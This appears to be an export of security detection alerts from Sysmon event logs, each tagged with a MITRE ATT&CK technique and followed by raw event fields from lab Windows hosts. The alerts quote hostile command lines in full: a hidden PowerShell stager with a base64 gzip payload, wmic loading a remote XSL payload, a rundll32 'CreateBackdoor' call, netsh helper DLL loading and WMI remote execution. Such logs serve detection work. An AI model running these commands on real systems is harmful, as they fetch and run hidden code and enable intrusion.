10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1608044415.695478,2020-12-15T19:00:15.695478+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 135 )",3,"
3
5
4
3
0
0x8000000000000000
589974
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-12-15 15:00:14.467
747F3D96-CF4B-5FD8-0000-00101AD58700
6976
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10
50007
false
10.0.2.17
MSEDGEWIN10CLONE
135
epmap
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.543692,2019-07-30T01:33:58.543692+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh.exe add helper AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4947
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:58.336
747F3D96-6646-5D3F-0000-001051388B00
3824
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c netsh.exe add helper AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243556
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.441
747F3D96-9F69-5E75-0000-00102F962000
6136
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
421225
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 22:53:05.675
747F3D96-75D1-5F8B-0000-001061BD3300
4864
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
C:\
MSEDGEWIN10\Administrator
747F3D96-75D0-5F8B-0000-0020A8A83300
0x33a8a8
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-75D1-5F8B-0000-00101DAB3300
2228
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
421225
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 22:53:05.675
747F3D96-75D1-5F8B-0000-001061BD3300
4864
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
C:\
MSEDGEWIN10\Administrator
747F3D96-75D0-5F8B-0000-0020A8A83300
0x33a8a8
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-75D1-5F8B-0000-00101DAB3300
2228
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
421225
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 22:53:05.675
747F3D96-75D1-5F8B-0000-001061BD3300
4864
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
C:\
MSEDGEWIN10\Administrator
747F3D96-75D0-5F8B-0000-0020A8A83300
0x33a8a8
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-75D1-5F8B-0000-00101DAB3300
2228
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle, -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
9808
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:26:51.965
365ABB72-AF8B-5CC8-0000-0010AC1B1900
3872
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-2586-5CC9-0000-0020E7030000
0x3e7
0
System
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-AF8B-5CC8-0000-00101C1A1900
3348
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzli
DFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.485479,2019-07-30T01:33:58.485479+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace show status ),1,"
1
5
4
1
0
0x8000000000000000
4946
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:58.273
747F3D96-6646-5D3F-0000-0010A7318B00
4148
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c netsh trace show status
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1,"
1
5
4
1
0
0x8000000000000000
9808
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:26:51.965
365ABB72-AF8B-5CC8-0000-0010AC1B1900
3872
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-2586-5CC9-0000-0020E7030000
0x3e7
0
System
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-AF8B-5CC8-0000-00101C1A1900
3348
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.286383,2019-07-30T01:33:58.286383+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ),1,"
1
5
4
1
0
0x8000000000000000
4945
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:58.245
747F3D96-6646-5D3F-0000-0010E32E8B00
5084
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656012.106089,2019-05-01T00:26:52.106089+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1,"
1
5
4
1
0
0x8000000000000000
9807
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:26:51.949
365ABB72-AF8B-5CC8-0000-00101C1A1900
3348
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-2586-5CC9-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-2586-5CC9-0000-0010DC530000
460
C:\Windows\System32\services.exe
C:\Windows\system32\services.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1594332063.89924,2020-07-10T02:01:03.899240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" ),1,"
1
5
4
1
0
0x8000000000000000
311373
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-07-09 22:01:03.894
747F3D96-939F-5F07-0000-0010888E4600
7456
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
PowerShell.EXE
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"
C:\Users\IEUser\
MSEDGEWIN10\IEUser
747F3D96-86FA-5F07-0000-00204A8B0600
0x68b4a
2
Medium
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-86FC-5F07-0000-00101E4B0700
2356
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436034.630548,2019-07-30T01:33:54.630548+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1,"
1
5
4
1
0
0x8000000000000000
4941
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:54.044
747F3D96-6642-5D3F-0000-0010F69D8A00
4896
C:\Windows\System32\wbem\WMIC.exe
10.0.17763.1 (WinBuild.160101.0800)
WMI Commandline Utility
Microsoft® Windows® Operating System
Microsoft Corporation
wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E
747F3D96-6641-5D3F-0000-0010A38C8A00
4260
C:\Windows\System32\cmd.exe
cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028567.80776,2019-03-20T00:49:27.807760+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966388
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:49:27.697
365ABB72-55D7-5C91-0000-001067BD0700
2236
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
421218
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 22:53:05.428
747F3D96-75D1-5F8B-0000-00109EB23300
2628
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
C:\
MSEDGEWIN10\Administrator
747F3D96-75D0-5F8B-0000-0020A8A83300
0x33a8a8
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-75D1-5F8B-0000-00101DAB3300
2228
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
